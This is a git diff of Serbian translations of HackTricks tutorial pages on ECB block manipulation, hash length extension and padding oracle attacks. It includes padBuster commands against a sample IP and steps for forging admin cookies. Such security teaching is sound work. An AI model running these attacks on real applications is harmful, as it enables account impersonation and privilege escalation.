-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju oglašenu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index 3e2e0f6d8..7805bd253 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -1,58 +1,59 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # ECB -(ECB) Electronic Code Book - simetrična šema enkripcije koja **zamenjuje svaki blok čistog teksta** blokom šifrovane poruke. To je **najjednostavnija** šema enkripcije. Glavna ideja je da se čisti tekst podeli na **blokove od N bita** (zavisi od veličine bloka ulaznih podataka, algoritma enkripcije) i zatim da se svaki blok čistog teksta enkriptuje (dekriptuje) koristeći samo ključ. +(ECB) Elektronski kodni blok - simetrična šema šifrovanja koja **zamenjuje svaki blok čistog teksta** sa **blokom šifrovanog teksta**. To je **najjednostavnija** šema šifrovanja. Osnovna ideja je da se **podeli** čisti tekst u **blokove od N bitova** (zavisi od veličine bloka ulaznih podataka, algoritma šifrovanja) i zatim da se šifruje (dešifruje) svaki blok čistog teksta koristeći jedini ključ. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) -Korišćenje ECB ima više sigurnosnih implikacija: +Korišćenje ECB ima višestruke sigurnosne implikacije: -* **Blokovi iz šifrovane poruke mogu biti uklonjeni** +* **Blokovi iz šifrovanje poruke mogu biti uklonjeni** * **Blokovi iz šifrovane poruke mogu biti premesteni** # Otkrivanje ranjivosti -Zamislite da se prijavljujete na aplikaciju nekoliko puta i **uvek dobijate isti kolačić**. To je zato što je kolačić aplikacije **`|`**.\ +Zamislite da se prijavljujete na aplikaciju nekoliko puta i **uvek dobijate isti kolačić**. To je zato što je kolačić aplikacije **`|`**.\ Zatim, generišete dva nova korisnika, oba sa **istom dugom lozinkom** i **skoro** **istim** **korisničkim imenom**.\ -Otkrivate da su **blokovi od 8B** gde je **informacija o oba korisnika** ista **jednaki**. Tada pretpostavljate da se možda koristi **ECB**. +Otkrijete da su **blokovi od 8B** gde je **informacija oba korisnika** ista **jednaki**. Tada, pretpostavljate da se to možda dešava jer se koristi **ECB**. -Kao u sledećem primeru. Primetite kako ova **2 dekodirana kolačića** imaju nekoliko puta blok **`\x23U\xE45K\xCB\x21\xC8`** +Kao u sledećem primeru. Posmatrajte kako ova **2 dekodirana kolačića** imaju nekoliko puta blok **`\x23U\xE45K\xCB\x21\xC8`** ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -Ovo je zato što su **korisničko ime i lozinka tih kolačića sadržavali više puta slovo "a"** (na primer). **Blokovi** koji su **različiti** su blokovi koji su sadržavali **barem 1 različit karakter** (možda razdelnik "|" ili neka neophodna razlika u korisničkom imenu). +Ovo je zato što su **korisničko ime i lozinka tih kolačića sadržali više puta slovo "a"** (na primer). **Blokovi** koji su **različiti** su blokovi koji su sadržali **barem 1 različit karakter** (možda razdelnik "|" ili neka neophodna razlika u korisničkom imenu). -Sada napadač samo treba da otkrije da li je format `` ili ``. Da bi to uradio, može jednostavno **generisati nekoliko korisničkih imena** sa **sličnim i dugim korisničkim imenima i lozinkama** dok ne pronađe format i dužinu razdelnika: +Sada napadač samo treba da otkrije da li je format `` ili ``. Da bi to uradio, može jednostavno **generisati nekoliko korisničkih imena** sa **sličnim i dugim korisničkim imenima i lozinkama dok ne otkrije format i dužinu razdelnika:** -| Dužina korisničkog imena: | Dužina lozinke: | Dužina korisničkog imena+lozinke: | Dužina kolačića (nakon dekodiranja): | -| ------------------------ | --------------- | --------------------------------- | ----------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +| Dužina korisničkog imena: | Dužina lozinke: | Dužina korisničkog imena+Lozinke: | Dužina kolačića (nakon dekodiranja): | +| -------------------------- | ---------------- | ---------------------------------- | -------------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | # Iskorišćavanje ranjivosti ## Uklanjanje celih blokova -Znajući format kolačića (`|`), kako biste se predstavili kao korisnik `admin`, kreirajte novog korisnika pod imenom `aaaaaaaaadmin` i dobijte kolačić i dekodirajte ga: +Znajući format kolačića (`|`), kako bi se predstavio kao korisnik `admin`, kreirajte novog korisnika pod imenom `aaaaaaaaadmin` i dobijte kolačić, zatim ga dekodirajte: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -61,34 +62,19 @@ Zatim, možete ukloniti prvi blok od 8B i dobićete validan kolačić za korisni ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -## Померање блокова +## Pomeranje blokova -У многим базама података је исто да претражујете `WHERE username='admin';` или `WHERE username='admin ';` _(Обратите пажњу на додатне размаке)_ +U mnogim bazama podataka isto je tražiti `WHERE username='admin';` ili `WHERE username='admin ';` _(Primetite dodatne razmake)_ -Дакле, још један начин да се представите као корисник `admin` би био: +Dakle, još jedan način da se predstavite kao korisnik `admin` bio bi: -* Генеришите корисничко име тако да је `len() + len(` ће генерисати 2 блока од 8B. -* Затим, генеришите лозинку која ће попунити тачан број блокова који садрже корисничко име које желимо да се представимо и размаке, на пример: `admin ` +* Generišite korisničko ime koje: `len() + len(` će generisati 2 bloka od 8B. +* Zatim, generišite lozinku koja će popuniti tačan broj blokova koji sadrže korisničko ime koje želimo da predstavimo i razmake, kao što je: `admin ` -Колачић овог корисника ће бити састављен од 3 блока: прва 2 блока су блокови корисничког имена + разделник, а трећи је блок лозинке (која се претвара у корисничко име): `username |admin ` +Kolačić ovog korisnika će biti sastavljen od 3 bloka: prva 2 bloka su blokovi korisničkog imena + delimitera, a treći je lozinka (koja predstavlja korisničko ime): `username |admin ` -**Затим, само замените први блок са последњим и представљате се као корисник `admin`: `admin |username`** +**Zatim, jednostavno zamenite prvi blok sa poslednjim i predstavljate korisnika `admin`: `admin |username`** -## Референце +## Reference * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) - - -
- -Научите хаковање AWS-а од нуле до хероја са htARTE (HackTricks AWS Red Team Expert)! - -Други начини да подржите HackTricks: - -* Ако желите да видите **вашу компанију рекламирану на HackTricks** или **преузмете HackTricks у PDF формату** Проверите [**ПРЕТПЛАТНЕ ПЛАНОВЕ**](https://github.com/sponsors/carlospolop)! -* Набавите [**званични PEASS & HackTricks сувенир**](https://peass.creator-spring.com) -* Откријте [**The PEASS Family**](https://opensea.io/collection/the-peass-family), нашу колекцију ексклузивних [**NFT-ова**](https://opensea.io/collection/the-peass-family) -* **Придружите се** 💬 [**Discord групи**](https://discord.gg/hRep4RUj7f) или [**телеграм групи**](https://t.me/peass) или **пратите** нас на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поделите своје хакерске трикове слањем PR-ова на** [**HackTricks**](https://github.com/carlospolop/hacktricks) и [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github репозиторијуме. - -
diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 6e4bc4320..99e6b931b 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -1,36 +1,37 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -# Sumiranje napada +# Rezime napada -Zamislite server koji **potpisuje** neke **podatke** tako što **dodaje** **tajnu vrednost** nekim poznatim čistim tekstualnim podacima, a zatim hešira te podatke. Ako znate: +Zamislite server koji **potpisuje** neke **podatke** tako što dodaje **tajnu vrednost** na neke poznate čiste tekstualne podatke, a zatim hešira te podatke. Ako znate: * **Dužinu tajne** (ovo takođe može biti probijeno iz datog opsega dužine) * **Čiste tekstualne podatke** * **Algoritam (i ranjiv je na ovaj napad)** * **Padding je poznat** -* Obično se koristi podrazumevani, pa ako su ispunjeni i ostali zahtevi, i ovaj je +* Obično se koristi podrazumevani, pa ako su ispunjeni i drugi 3 zahteva, i ovaj je * Padding varira u zavisnosti od dužine tajne+podataka, zbog čega je potrebna dužina tajne -Onda je moguće da **napadač** **doda** **podatke** i **generiše** validan **potpis** za **prethodne podatke + dodate podatke**. +Onda je moguće da **napadač** doda **podatke** i **generiše** validan **potpis** za **prethodne podatke + dodate podatke**. ## Kako? -Osnovno, ranjivi algoritmi generišu hešove tako što prvo **heširaju blok podataka**, a zatim, **iz** prethodno kreiranog **heša** (stanja), dodaju **sledeći blok podataka** i **heširaju ga**. +Osnovno, ranjivi algoritmi generišu hešove tako što prvo **heširaju blok podataka**, a zatim, **iz** prethodno **kreiranog heša** (stanja), dodaju **sledeći blok podataka** i **heširaju ga**. -Zatim, zamislite da je tajna "tajna" i podaci su "podaci", MD5 od "tajnapodaci" je 6036708eba0d11f6ef52ad44e8b74d5b.\ +Zamislite da je tajna "tajna" i podaci su "podaci", MD5 od "tajnapodaci" je 6036708eba0d11f6ef52ad44e8b74d5b.\ Ako napadač želi da doda string "dodatak" može: * Generisati MD5 od 64 "A" @@ -47,16 +48,17 @@ Ako napadač želi da doda string "dodatak" može: Ovaj napad možete pronaći dobro objašnjen na [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Pomozite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index 42b15863f..dc6fbaa60 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # CBC - Cipher Block Chaining -U CBC režimu, **prethodni šifrovani blok se koristi kao IV** za XOR sa sledećim blokom: +U CBC režimu se **prethodni šifrovani blok koristi kao IV** za XOR sa sledećim blokom: ![https://defuse.ca/images/cbc\_encryption.png](https://defuse.ca/images/cbc\_encryption.png) @@ -25,12 +26,12 @@ Za dešifrovanje CBC-a se vrše **suprotne operacije**: Primetite kako je potrebno koristiti **ključ za šifrovanje** i **IV**. -# Poravnavanje poruke +# Padding Poruke -Pošto se šifrovanje vrši u **fiksnim veličinama blokova**, obično je potrebno poravnavanje u **poslednjem bloku** da bi se kompletirala njegova dužina.\ -Obično se koristi **PKCS7**, koji generiše poravnavanje **ponavljanjem** **broja** **bajtova** **potrebnih** da se kompletira blok. Na primer, ako poslednjem bloku nedostaju 3 bajta, poravnavanje će biti `\x03\x03\x03`. +Pošto se šifrovanje vrši u **fiksnim veličinama blokova**, **padding** je obično potreban u **poslednjem bloku** da bi se kompletirala njegova dužina.\ +Obično se koristi **PKCS7**, koji generiše padding **ponavljanjem** **broja** **bajtova** **potrebnih** da se **kompletira** blok. Na primer, ako poslednjem bloku nedostaju 3 bajta, padding će biti `\x03\x03\x03`. -Pogledajmo još primera sa **2 bloka dužine 8 bajta**: +Pogledajmo još primera sa **2 bloka dužine 8 bajtova**: | bajt #0 | bajt #1 | bajt #2 | bajt #3 | bajt #4 | bajt #5 | bajt #6 | bajt #7 | bajt #0 | bajt #1 | bajt #2 | bajt #3 | bajt #4 | bajt #5 | bajt #6 | bajt #7 | | ------- | ------- | ------- | ------- | ------- | ------- | ------- | ------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | -------- | @@ -39,13 +40,13 @@ Pogledajmo još primera sa **2 bloka dužine 8 bajta**: | P | A | S | S | W | O | R | D | 1 | 2 | 3 | **0x05** | **0x05** | **0x05** | **0x05** | **0x05** | | P | A | S | S | W | O | R | D | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | **0x08** | -Primetite kako je u poslednjem primeru **poslednji blok bio pun pa je generisan još jedan samo sa poravnavanjem**. +Primetite kako je u poslednjem primeru **poslednji blok bio pun pa je generisan još jedan samo sa paddingom**. # Padding Oracle -Kada aplikacija dešifruje šifrovane podatke, prvo će dešifrovati podatke, a zatim će ukloniti poravnavanje. Tokom čišćenja poravnavanja, ako **neispravno poravnavanje izazove detektovano ponašanje**, imate **ranjivost padding orakla**. Detektovano ponašanje može biti **greška**, **nedostatak rezultata** ili **sporiji odgovor**. +Kada aplikacija dešifruje šifrovane podatke, prvo će dešifrovati podatke; zatim će ukloniti padding. Tokom čišćenja paddinga, ako **neispravan padding pokrene detektibilno ponašanje**, imate **ranjivost padding orakla**. Detektibilno ponašanje može biti **greška**, **nedostatak rezultata** ili **sporiji odgovor**. -Ako detektujete ovo ponašanje, možete **dešifrovati šifrovane podatke** i čak **šifrovati bilo koji čisti tekst**. +Ako primetite ovo ponašanje, možete **dešifrovati šifrovane podatke** i čak **šifrovati bilo koji čisti tekst**. ## Kako iskoristiti @@ -57,23 +58,23 @@ Da biste testirali da li je kolačić sajta ranjiv, možete pokušati: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" ``` -**Kodiranje 0** znači da se koristi **base64** (ali dostupni su i drugi, proverite meni za pomoć). +**Kodiranje 0** znači da se koristi **base64** (ali su dostupni i drugi, proverite meni pomoći). -Takođe možete **zloupotrebiti ovu ranjivost da biste šifrovali nove podatke. Na primer, zamislite da je sadržaj kolačića "**_**user=MyUsername**_**", tada ga možete promeniti u "\_user=administrator\_" i povećati privilegije unutar aplikacije. Takođe to možete uraditi koristeći `padbuster` i navodeći parametar -plaintext**. +Takođe možete **zloupotrebiti ovu ranjivost da biste šifrovali nove podatke. Na primer, zamislite da je sadržaj kolačića "**_**korisnik=MojeKorisničkoIme**_**", tada ga možete promeniti u "\_korisnik=administrator\_" i eskalirati privilegije unutar aplikacije. To takođe možete uraditi koristeći `paduster` navođenjem parametra -plaintext**: ```bash perl ./padBuster.pl http://10.10.10.10/index.php "RVJDQrwUdTRWJUVUeBKkEA==" 8 -encoding 0 -cookies "login=RVJDQrwUdTRWJUVUeBKkEA==" -plaintext "user=administrator" ``` -Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u paddingu, ali možete takođe navesti poruku o grešci koristeći parametar **-error**. +Ako je sajt ranjiv, `padbuster` će automatski pokušati da pronađe kada se javlja greška u popunjavanju, ali možete i sami naznačiti poruku o grešci koristeći parametar **-error**. ```bash perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon=RVJDQrwUdTRWJUVUeBKkEA==" -error "Invalid padding" ``` ## Teorija -U **kratkim crtama**, možete početi dešifrovati šifrovane podatke tako što ćete pogađati tačne vrednosti koje mogu biti korišćene za stvaranje svih **različitih punjenja**. Zatim, napad na orakl za punjenje će početi dešifrovati bajtove od kraja prema početku pogađajući koja će biti tačna vrednost koja **stvara punjenje od 1, 2, 3, itd**. +U **kratko**, možete početi dešifrovanje šifrovanih podataka pogađajući tačne vrednosti koje se mogu koristiti za kreiranje svih **različitih punjenja**. Zatim, napad padding orakl će početi dešifrovanje bajtova od kraja ka početku pogađajući koja će biti tačna vrednost koja **stvara punjenje od 1, 2, 3, itd**. ![](<../.gitbook/assets/image (629) (1) (1).png>) -Zamislite da imate neki šifrovani tekst koji zauzima **2 bloka** formirana bajtovima od **E0 do E15**.\ +Zamislite da imate neki šifrovan tekst koji zauzima **2 bloka** formirana bajtovima od **E0 do E15**.\ Da biste **dešifrovali** **poslednji** **blok** (**E8** do **E15**), ceo blok prolazi kroz "dešifrovanje blok šifre" generišući **posredne bajtove I0 do I15**.\ Na kraju, svaki posredni bajt se **XORuje** sa prethodnim šifrovanim bajtovima (E0 do E7). Dakle: @@ -83,42 +84,43 @@ Na kraju, svaki posredni bajt se **XORuje** sa prethodnim šifrovanim bajtovima * `C12 = I12 ^ E4` * ... -Sada je moguće **izmeniti `E7` sve dok je `C15` `0x01`**, što će takođe biti ispravno punjenje. Dakle, u ovom slučaju: `\x01 = I15 ^ E'7` +Sada je moguće **modifikovati `E7` dok `C15` ne bude `0x01`**, što će takođe biti tačno punjenje. Dakle, u ovom slučaju: `\x01 = I15 ^ E'7` -Dakle, pronalaženjem E'7, moguće je izračunati I15: `I15 = 0x01 ^ E'7` +Dakle, pronalaženjem E'7, moguće je **izračunati I15**: `I15 = 0x01 ^ E'7` Što nam omogućava da **izračunamo C15**: `C15 = E7 ^ I15 = E7 ^ \x01 ^ E'7` -Znajući **C15**, sada je moguće **izračunati C14**, ali ovaj put brute-force metodom koristeći punjenje `\x02\x02`. +Znajući **C15**, sada je moguće **izračunati C14**, ali ovog puta forsujući punjenje `\x02\x02`. -Ovaj BF je jednako složen kao i prethodni, jer je moguće izračunati E''15 čija je vrednost 0x02: `E''7 = \x02 ^ I15` tako da je potrebno samo pronaći **`E'14`** koji generiše **`C14` jednak `0x02`**.\ -Zatim, uradite iste korake da biste dešifrovali C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** +Ovaj BF je jednako složen kao i prethodni jer je moguće izračunati `E''15` čija je vrednost 0x02: `E''7 = \x02 ^ I15` tako da je potrebno samo pronaći **`E'14`** koji generiše **`C14` jednako `0x02`**.\ +Zatim, uradite iste korake za dešifrovanje C14: **`C14 = E6 ^ I14 = E6 ^ \x02 ^ E''6`** -**Pratite ovaj lanac dok ne dešifrujete ceo šifrovani tekst.** +**Pratite ovaj lanac dok ne dešifrujete ceo šifrovan tekst.** ## Otkrivanje ranjivosti Registrujte nalog i prijavite se sa tim nalogom.\ -Ako se **mnoštvo puta prijavite** i uvek dobijete **isti kolačić**, verovatno postoji **nešto** **pogrešno** u aplikaciji. Kolačić koji se vraća trebao bi biti jedinstven svaki put kada se prijavite. Ako je kolačić **uvek** isti, verovatno će uvek biti validan i neće biti načina da se on poništi. +Ako se **prijavite mnogo puta** i uvek dobijete **isti kolačić**, verovatno postoji **nešto** **pogrešno** u aplikaciji. Kolačić koji se vraća trebao bi biti jedinstven svaki put kada se prijavite. Ako je kolačić **uvek** **isti**, verovatno će uvek biti validan i neće biti načina da se on poništi. -Sada, ako pokušate **izmeniti** kolačić, možete videti da dobijate **grešku** od aplikacije.\ -Ali ako BF punjenje (koristeći na primer padbuster) uspete da dobijete drugi kolačić koji je validan za drugog korisnika. Ovaj scenario je vrlo verovatno ranjiv na padbuster. +Sada, ako pokušate da **modifikujete** kolačić, videćete da dobijate **grešku** od aplikacije.\ +Ali ako forsite punjenje (koristeći na primer padbuster) uspećete da dobijete drugi kolačić koji je validan za drugog korisnika. Ovaj scenario je vrlo verovatno ranjiv na padbuster. ## Reference * [https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation](https://en.wikipedia.org/wiki/Block\_cipher\_mode\_of\_operation) +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini da podržite HackTricks: - -* Ako želite da vidite svoju **kompaniju reklamiranu u HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks 